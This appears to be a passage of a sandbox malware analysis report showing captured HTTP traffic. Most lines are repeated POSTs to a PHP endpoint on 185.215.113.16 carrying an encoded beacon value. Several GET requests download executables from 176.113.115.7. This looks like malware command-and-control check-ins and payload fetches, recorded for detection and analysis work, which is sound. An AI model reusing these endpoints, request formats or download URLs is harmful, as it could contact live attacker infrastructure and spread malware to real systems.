Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 35 38 32 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10358260101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /files/6150344932/39pazbF.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 35 38 35 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10358510101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /files/5876083921/Or1ARiR.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 33 35 39 33 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10359310101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/7708303768/xZRvIQ5.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /files/7708303768/xZRvIQ5.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
